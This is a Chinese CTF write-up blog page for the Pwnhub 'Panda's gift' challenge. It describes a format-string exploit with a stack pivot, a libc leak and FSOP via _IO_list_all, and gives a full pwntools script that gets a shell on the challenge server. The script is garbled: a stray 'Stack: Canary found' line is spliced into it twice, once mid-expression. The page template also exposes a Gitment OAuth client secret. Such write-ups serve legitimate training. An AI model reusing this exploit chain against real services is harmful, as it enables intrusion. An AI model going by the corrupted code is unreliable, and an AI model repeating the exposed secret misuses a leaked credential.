<!DOCTYPE html>



  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">
<script>
    (function(){
        if(''){
            if (prompt('请输入文章密码') !== ''){
                alert('密码错误！');
                history.back();
            }
        }
    })();
</script>



  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-bounce.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="写在前面本萌新又开始玩pwn了，这次试一试pwnhub，竟然做出来了，希望有朝一日成为大佬。 题目描述首先，题目是x64，开的保护如下： 12345Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000) 功能： 12341.s">
<meta property="og:type" content="article">
<meta property="og:title" content="Pwnhub Panda&#39;s  gift">
<meta property="og:url" content="https://rainbow541.github.io/2018/06/29/Pwnhub Panda's  gift/index.html">
<meta property="og:site_name" content="Rainbow541&#39;s Blog">
<meta property="og:description" content="写在前面本萌新又开始玩pwn了，这次试一试pwnhub，竟然做出来了，希望有朝一日成为大佬。 题目描述首先，题目是x64，开的保护如下： 12345Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000) 功能： 12341.s">
<meta property="og:locale" content="zh-Hans">
<meta property="og:updated_time" content="2018-07-31T23:14:54.611Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Pwnhub Panda&#39;s  gift">
<meta name="twitter:description" content="写在前面本萌新又开始玩pwn了，这次试一试pwnhub，竟然做出来了，希望有朝一日成为大佬。 题目描述首先，题目是x64，开的保护如下： 12345Arch:     amd64-64-littleRELRO:    Full RELROStack:    Canary foundNX:       NX enabledPIE:      No PIE (0x400000) 功能： 12341.s">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://rainbow541.github.io/2018/06/29/Pwnhub Panda's  gift/"/>





  <title>Pwnhub Panda's  gift | Rainbow541's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Rainbow541's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://rainbow541.github.io/2018/06/29/Pwnhub Panda's  gift/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="rainbow541">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Rainbow541's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Pwnhub Panda's  gift</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2018-06-29T00:00:00+08:00">
                2018-06-29
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          
            <div class="post-wordcount">
              
                
                <span class="post-meta-item-icon">
                  <i class="fa fa-file-word-o"></i>
                </span>
                
                  <span class="post-meta-item-text">字数统计&#58;</span>
                
                <span title="字数统计">
                  1,212
                </span>
              

              

              
            </div>
          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h2 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>写在前面</h2><p>本萌新又开始玩pwn了，这次试一试pwnhub，竟然做出来了，希望有朝一日成为大佬。</p>
<h2 id="题目描述"><a href="#题目描述" class="headerlink" title="题目描述"></a>题目描述</h2><p>首先，题目是x64，开的保护如下：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Arch:     amd64-64-little</span><br><span class="line">RELRO:    Full RELRO</span><br><span class="line">Stack:    Canary found</span><br><span class="line">NX:       NX enabled</span><br><span class="line">PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>
<p>功能：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">1.set name</span><br><span class="line">2.set motto</span><br><span class="line">3.show motto</span><br><span class="line">4.Exit</span><br></pre></td></tr></table></figure>
<p>且每个功能只能调用一次，除非修改bss段上的一个用作判断的值。</p>
<a id="more"></a>
<p>name和motto存放在mmap映射的空间中，空间的地址是由当前时间做种子生成的伪随机数与0xFFFFFFFF相与。</p>
<h2 id="题目漏洞"><a href="#题目漏洞" class="headerlink" title="题目漏洞"></a>题目漏洞</h2><p>题目存在一个格式化字符串的漏洞，处在１功能中，并且这个漏洞经历了两次函数调用，（第一次调用的函数没有其他代码，直接调用第二个函数）。有一次的scanf，其参数在栈中，这个漏洞在３功能中。</p>
<p>但是我们的格式化字符串只允许写入６个字符。</p>
<h2 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h2><h3 id="修改scanf参数"><a href="#修改scanf参数" class="headerlink" title="修改scanf参数"></a>修改scanf参数</h3><p>既然，scanf的参数在栈中，只要我们能修改，就可以达到修改scanf参数的目的。</p>
<p>首先，我们虽然只能写入６个字符，不能达到写任何数据，但是我们可以写入<code>\x00</code>，另外我们的printf和主函数中间加了一个函数，于是返回时，栈就会抬高。这样，我们就可以通过将rbp的最后一个双字改为０，这样栈就能被抬高，这样，本来scanf的格式的参数（放在栈中），就会被抬高到我们可控的区间。</p>
<p>修改前栈空间</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">0000| 0x7ffc62400110 --&gt; 0x7ffc62400120 --&gt; 0x7ffc62400150 --&gt; 0x7ffc62400180 --&gt; 0x7ffc62619320 --&gt; 0x400fb0 (push   r15)</span><br><span class="line">0008| 0x7ffc62400118 --&gt; 0x400d47 (nop)</span><br><span class="line">0016| 0x7ffc62400120 --&gt; 0x7ffc62400150 --&gt; 0x7ffc62400180 --&gt; 0x7ffc62619320 --&gt; 0x400fb0 (push   r15)</span><br><span class="line">0024| 0x7ffc62400128 --&gt; 0x400eba (jmp    0x400f4b)</span><br><span class="line">0032| 0x7ffc62400130 --&gt; 0x0 </span><br><span class="line">0040| 0x7ffc62400138 --&gt; 0x100400bf8 </span><br><span class="line">0048| 0x7ffc62400140 --&gt; 0x4010bc --&gt; 0x796e6f6e61006425 ('%d')</span><br><span class="line">0056| 0x7ffc62400148 --&gt; 0x99eb47c21da21700</span><br><span class="line">----------------------------------</span><br><span class="line">RBP: 0x7ffc62400110 --&gt; 0x7ffc62400120 --&gt; 0x7ffc62400150 --&gt; 0x7ffc62400180 --&gt; 0x7ffc62619320 --&gt; 0x400fb0 (push   r15)</span><br></pre></td></tr></table></figure>
<p>修改后栈空间</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">0000| 0x7ffc62400110 --&gt; 0x7ffc62400120 --&gt; 0x7ffc62400000 --&gt; 0x400980 (xor    ebp,ebp)</span><br><span class="line">0008| 0x7ffc62400118 --&gt; 0x400d47 (nop)</span><br><span class="line">0016| 0x7ffc62400120 --&gt; 0x7ffc62400000 --&gt; 0x400980 (xor    ebp,ebp)</span><br><span class="line">0024| 0x7ffc62400128 --&gt; 0x400eba (jmp    0x400f4b)</span><br><span class="line">0032| 0x7ffc62400130 --&gt; 0x0 </span><br><span class="line">0040| 0x7ffc62400138 --&gt; 0x100400bf8 </span><br><span class="line">0048| 0x7ffc62400140 --&gt; 0x4010bc --&gt; 0x796e6f6e61006425 ('%d')</span><br><span class="line">0056| 0x7ffc62400148 --&gt; 0x99eb47c21da21700</span><br></pre></td></tr></table></figure>
<p>0x7ffc62400000上面有一部分值是我们添加motto时可控的，于是我们就能把scanf的参数改掉：</p>
<p>0x7ffc623ffff0就是我们存放参数的地方，我们可以使得其中内容为我们可以控制的地方，比如说能放置motto的mmap的空间：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x7ffc623ffff0:	0x000000001ca13000</span><br></pre></td></tr></table></figure>
<p>然后只要我们在motto上写入我们想要的格式。</p>
<h3 id="leak-address"><a href="#leak-address" class="headerlink" title="leak address"></a>leak address</h3><p>当我们控制了scanf的格式后，我们就能对其参数进行修改。</p>
<p>栈上有这样的内容：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0032| 0x7ffc62400150 --&gt; 0x7ffc62400180 --&gt; 0x7ffc62619320 --&gt; 0x400fb0 (push   r15)</span><br></pre></td></tr></table></figure>
<p>于是我们通过修改0x7ffc62400150使得0x7ffc62400180指向的地址改变，之后修改0x7ffc62400180，改变0x7ffc62400180指向的地址中的内容，从而达到任意写。</p>
<p>经过计算，参数的偏移是10和16，于是，我们可以构造出这样的格式串，%d,%10$ld,%16$s，后面我们还需要使用３号功能，于是我们需要在之前加上%d。这样我们传入放置motto的地址，之后放入got表的地址，就能将got表的地址写入motto，这样我们调用3功能，就能leak出libc的地址。</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0032| 0x7ffc62400150 --&gt; 0x7ffc62400180 --&gt; 0x602058 --&gt; 0x601ff0 --&gt; 0x7f041d70d030 (&lt;__GI_exit&gt;:	)</span><br></pre></td></tr></table></figure>
<p>于是就能得到地址了。</p>
<h3 id="修改-IO-list-all"><a href="#修改-IO-list-all" class="headerlink" title="修改 _IO_list_all"></a>修改 _IO_list_all</h3><p>本题got表不可写，vtable处也不可写，于是我就使用了FSOP（可以看我上篇文章，bctf,baby_arena），写好之后，getshell。</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=UTF-8</span></span><br><span class="line"><span class="comment">#author = rainbow541</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> ctypes <span class="keyword">import</span> cdll</span><br><span class="line"></span><br><span class="line"><span class="comment">#context.log_level = 'debug'</span></span><br><span class="line">bin = ELF(<span class="string">'./babyfmt'</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_name</span><span class="params">(p,text)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">    p.sendline(<span class="string">'1'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'name:'</span>)</span><br><span class="line">    p.sendline(text)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">set_motto</span><span class="params">(p,text)</span>:</span></span><br><span class="line">    p.recvuntil(<span class="string">'&gt;'</span>)</span><br><span class="line">    p.sendline(<span class="string">'2'</span>)</span><br><span class="line">    p.recvuntil(<span class="string">'motto:'</span>)</span><br><span class="line">    p.sendline(text)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pwn</span><span class="params">(i,local)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> local == <span class="number">1</span>:</span><br><span class="line">        p = process(<span class="string">'./babyfmt'</span>)</span><br><span class="line">        libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">        libcc = cdll.LoadLibrary(<span class="string">"/lib/x86_64-linux-gnu/libc.so.6"</span>)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        p = remote(<span class="string">'54.222.191.56'</span>,<span class="number">9999</span>)</span><br><span class="line">        libc = ELF(<span class="string">'./libc-2.23.so'</span>)</span><br><span class="line">        libcc = cdll.LoadLibrary(<span class="string">"./libc-2.23.so"</span>)</span><br><span class="line">        </span><br><span class="line">	address_dest  = <span class="number">0x0000000000602058</span></span><br><span class="line">	<span class="comment">#----mmap address-----</span></span><br><span class="line">	time = libcc.time(<span class="number">0</span>) + i</span><br><span class="line">	<span class="keyword">print</span> <span class="string">"time:"</span>+str(i)</span><br><span class="line">	libcc.srand(time)</span><br><span class="line">	v2 = libcc.rand() &amp; <span class="number">0xFFFFF000</span></span><br><span class="line">	v3 = libcc.rand() &amp; <span class="number">0xFFFFF000</span></span><br><span class="line">	success(<span class="string">"v2: "</span>+hex(v2))</span><br><span class="line">	success(<span class="string">"dest: "</span>+hex(v3))</span><br><span class="line">	<span class="comment">#--------------------------</span></span><br><span class="line">	<span class="comment">#-------------fake file---</span></span><br><span class="line">	fake_file = p64(<span class="number">0</span>)*<span class="number">5</span></span><br><span class="line">	fake_file += p64(<span class="number">233</span>)</span><br><span class="line">	fake_file += p64(<span class="number">0</span>)*<span class="number">21</span></span><br><span class="line">	fake_file += p64(v3+<span class="number">40</span>+(<span class="number">28</span>*<span class="number">8</span>))</span><br><span class="line">	<span class="comment">#----------leak address---</span></span><br><span class="line">	payload_stack = <span class="string">'%d,%10$ld,%16$s'</span></span><br><span class="line">	set_motto(p,payload_stack + <span class="string">'A'</span>*(<span class="number">4</span>*<span class="number">8</span>-len(payload_stack))+p64(v3)+fake_file)</span><br><span class="line">	<span class="keyword">print</span> pidof(p)</span><br><span class="line">Stack:    Canary found</span><br><span class="line">	payload = <span class="string">"%6$hn"</span></span><br><span class="line">	set_name(p,payload)</span><br><span class="line">	p.sendline(<span class="string">"3,"</span>+str(address_dest)+<span class="string">","</span>+p64(bin.got[<span class="string">'exit'</span>]))</span><br><span class="line">	<span class="keyword">print</span> p.recvuntil(<span class="string">"&gt;"</span>)</span><br><span class="line">	sleep(<span class="number">0.5</span>)</span><br><span class="line">	address = p.recvuntil(<span class="string">"\n"</span>)[:<span class="number">-1</span>]</span><br><span class="line">	<span class="keyword">print</span> address</span><br><span class="line">	<span class="comment">#--------------------------</span></span><br><span class="line">	libc_exit_address = u64(address + <span class="string">'\x00'</span>*(<span class="number">8</span>-len(address)))</span><br><span class="line">	success(<span class="string">"libc_exit_address: "</span>+hex(libc_exit_address))</span><br><span class="line">	libc.address = libc_exit_address - libc.symbols[<span class="string">'exit'</span>]</span><br><span class="line">	success(<span class="string">'libc_address: '</span>+hex(libc.address))</span><br><span class="line"></span><br><span class="line">	<span class="comment">#---------------------------</span></span><br><span class="line"></span><br><span class="line">	p.sendline(<span class="string">"2,"</span>+str(v3+<span class="number">40</span>+(<span class="number">28</span>*<span class="number">8</span>)) + <span class="string">","</span> + p64(libc.</span><br><span class="line">Stack:    Canary foundaddress + <span class="number">0xf02a4</span>)*<span class="number">21</span>)</span><br><span class="line">	p.sendline(<span class="string">"2,"</span>+str(libc.symbols[<span class="string">'_IO_list_all'</span>]) + <span class="string">","</span> + p64(v3+<span class="number">40</span>))</span><br><span class="line">	p.interactive()</span><br><span class="line"></span><br><span class="line">pwn(<span class="number">0</span>,<span class="number">1</span>)</span><br></pre></td></tr></table></figure>
<h2 id="后记"><a href="#后记" class="headerlink" title="后记"></a>后记</h2><p>比赛第一天本地通了，远程一直没通，第二天换了台电脑，通了。。。。。。。</p>

      
    </div>
    
    
    

    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>感谢老爷打赏</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="https://upload-images.jianshu.io/upload_images/8148644-0fbf2b9b5972b6ed.jpg?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="rainbow541 支付宝"/>
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/06/29/pl0/" rel="next" title="pl0编译器源码">
                <i class="fa fa-chevron-left"></i> pl0编译器源码
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
  <div onclick="showGitment()" id="gitment_title" class="gitment_title">显示 Gitment 评论</div>
  <div id="container" style="display:none"></div>
  <link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
  <script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
  <script>
  const myTheme = {
    render(state, instance) {
      const container = document.createElement('div');
      container.lang = "en-US";
      container.className = 'gitment-container gitment-root-container';
      container.appendChild(instance.renderHeader(state, instance));
      container.appendChild(instance.renderEditor(state, instance));
      container.appendChild(instance.renderComments(state, instance));
      container.appendChild(instance.renderFooter(state, instance));
      return container;
    }
  }
  function showGitment() {
    $("#gitment_title").attr("style", "display:none");
    $("#container").attr("style", "").addClass("gitment_container");
    var gitment = new Gitment({
      id: window.location.pathname,
      theme: myTheme,
      owner: 'rainbow541',
      repo: 'rainbow541.github.io',
      oauth: {
        client_id: 'ed36115102b8c7e52f62',
        client_secret: '77ab6a9abf0c36021f818b3ab4112447b8d99aab'
      }
    });
    gitment.render('container');
  }
  </script>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">rainbow541</p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">10</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            

            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/rainbow541" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://space.bilibili.com/36873342/#/" target="_blank" title="哔哩哔哩">
                      
                        <i class="fa fa-fw fa-bold"></i>哔哩哔哩</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.jianshu.com/u/786b0e642b55" target="_blank" title="简书">
                      
                        <i class="fa fa-fw fa-bookmark"></i>简书</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://rainbow541.site/" title="最帅的pwn" target="_blank">最帅的pwn</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://greyd0g.github.io/" title="greydog" target="_blank">greydog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.undefinedv.cn/" title="最帅的web" target="_blank">最帅的web</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#写在前面"><span class="nav-number">1.</span> <span class="nav-text">写在前面</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#题目描述"><span class="nav-number">2.</span> <span class="nav-text">题目描述</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#题目漏洞"><span class="nav-number">3.</span> <span class="nav-text">题目漏洞</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#解题思路"><span class="nav-number">4.</span> <span class="nav-text">解题思路</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#修改scanf参数"><span class="nav-number">4.1.</span> <span class="nav-text">修改scanf参数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#leak-address"><span class="nav-number">4.2.</span> <span class="nav-text">leak address</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#修改-IO-list-all"><span class="nav-number">4.3.</span> <span class="nav-text">修改 _IO_list_all</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">4.4.</span> <span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#后记"><span class="nav-number">5.</span> <span class="nav-text">后记</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2018</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">rainbow541</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">13.0k</span>
  
</div>


 <!--  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>-->



  <span class="post-meta-divider">|</span>



  <!-- <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Pisces</a> v5.1.4</div>-->




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  






  
  







  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/three.min.js"></script>
  

  
  
    <script type="text/javascript" src="/lib/three/canvas_lines.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  







<!-- LOCAL: You can save these files to your site and update links -->
    
        
        <link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css">
        <script src="https://imsun.github.io/gitment/dist/gitment.browser.js"></script>
    
<!-- END LOCAL -->

    

    
      <script type="text/javascript">
      function renderGitment(){
        var gitment = new Gitment({
            id: window.location.pathname, 
            owner: '',
            repo: '',
            
            oauth: {
            
            
                client_secret: '77ab6a9abf0c36021f818b3ab4112447b8d99aab',
            
                client_id: 'ed36115102b8c7e52f62'
            }});
        gitment.render('gitment-container');
      }

      
      renderGitment();
      
      </script>
    







  





  

  

  

  
  

  

  

  

  undefined
  <script type="text/javascript" src="http://tajs.qq.com/stats?sId=65845847" charset="UTF-8"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
<script type="text/javascript" src="/js/src/love.js"></script>
